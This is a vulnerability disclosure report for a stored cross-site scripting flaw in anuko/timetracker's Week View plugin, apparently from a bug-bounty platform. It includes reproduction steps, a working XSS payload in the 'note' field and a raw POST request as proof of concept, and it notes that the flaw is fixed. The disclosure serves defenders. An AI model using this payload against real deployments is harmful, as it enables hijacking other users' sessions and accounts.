Stored XSS in Week View Plugin in anuko/timetracker

Valid

Reported on

Dec 18th 2022


Description

Stored cross-site scripting vulnerabilities arise when user input is stored and later embedded into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

Following authentication and after enabling the Week View plugin from the list of plugins integrated into Anuko Time Tracker, an attacker can take advantage of insufficient control of the user input on the POST parameter note to inject arbitrary javascript code that will be permanently stored. In this way, the input entered by the attacker will be triggered whenever the file timetracker/week.php is fetched for a previously specified date.

Requirements

• At least one existing project within the platform;

Week View plugin should be enabled.

Steps-To-Reproduce

• Log into the platform at timetracker/login.php.

• Move on timetracker/projects.php and create at least one project to meet the first of the requirements in the list.

• Browse the plugin list at timetracker/plugins.php and enable Week View, then Save. So, returning to timetracker/plugins.php the Configure option will appear right next to the above-mentioned plugin. Reaching the related form at timetracker/week_view.php it will be possible to browse the list of options present. Enable them all, then finally Save. In this way, the second requirement will also be met.

• Now, move on timetracker/time.php and create one entry on a specific date, including the current user, related project, then start and finish time so that the duration will be automatically calculated. Before submitting, inject the XSS payload '"><svg/x=">"/onload=confirm()// in the note form.

• Submit the entry so that it will appear pending right below the submission form.

• Finally, browse the timetracker/week.php file to see the XSS popping up whenever the entry list for the specified date are fetched.

Proof of Concept

POST /timetracker/time.php HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 202
Origin: http://<REDACTED>
Connection: close
Referer: http://<REDACTED>/timetracker/time.php
Cookie: tt_PHPSESSID=mm1eih01k11vv3m41vog4fntfe; tt_login=manager
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
DNT: 1
Sec-GPC: 1

date=2022-12-07&date=2022-12-07&user=2&project=1&start=22%3A04&finish=22%3A05&note=%27%22%3E%3Csvg%2Fx%3D%22%3E%22%2Fonload%3Dconfirm%28%29%2F%2F&btn_submit=Submit&user_changed=&browser_today=2022-12-18

Impact

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can perform any action within the application that the user can perform, view any information that the user is able to view, modify any information that the user is able to modify or initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.

We are processing your report and will contact the anuko/timetracker team within 24 hours. 5 months ago
Ben Harvie validated this vulnerability 15 days ago
Samuele Gugliotta has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Ben Harvie marked this as fixed in 1.22.12.5783 with commit 093cfe 15 days ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Ben Harvie published this vulnerability 15 days ago
to join this conversation